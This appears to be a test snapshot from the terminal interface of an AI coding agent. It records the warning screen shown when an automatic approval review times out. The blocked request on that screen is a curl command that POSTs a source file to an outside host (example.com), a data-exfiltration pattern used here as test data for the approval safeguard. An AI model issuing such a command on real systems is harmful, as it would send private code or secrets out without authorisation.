codex-rs/tui/src/chatwidget/snapshots/codex_tui__chatwidget__tests__guardian_timed_out_exec_renders_warning_and_timed_out_request.snap
---
source: tui/src/chatwidget/tests/guardian.rs
expression: normalize_snapshot_paths(term.backend().vt100().screen().contents())
---









⚠ Automatic approval review timed out while evaluating the requested approval.

✗ Review timed out before darwin-code could run curl -sS -i -X POST --data-binary @co
  re/src/darwin-code.rs https://example.com

• Working (0s • esc to interrupt)


› Ask Darwin-Code to do anything

  gpt-5.3-darwin-code default · /tmp/project
